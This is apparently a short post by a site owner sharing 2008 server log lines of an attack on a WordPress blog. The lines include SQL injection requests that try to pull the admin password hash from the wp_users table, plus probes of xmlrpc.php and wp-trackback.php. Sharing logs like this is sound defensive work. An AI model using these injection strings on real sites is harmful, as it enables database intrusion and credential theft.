Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.
Note the attempt to get the user passwords from the wp_users table:
216.83.63.254 – – [03/Oct/2008:14:30:38 -0400] “GET /xmlrpc.php HTTP/1.1” 200 42
“-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:39 -0400] “POST /xmlrpc.php HTTP/1.1” 403 9
70 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:47 -0400] “POST /wp-trackback.php?tb_id=1 H
TTP/1.1” 403 984 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:54 -0400] “GET /index.php?cat=%2527+UNION+S
ELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+i
d=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /index.php?cat=999+UNION+SEL
ECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FRO
M+wp_users+where+id=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss
6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /wp-trackback.php?p=1 HTTP/1
.1” 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”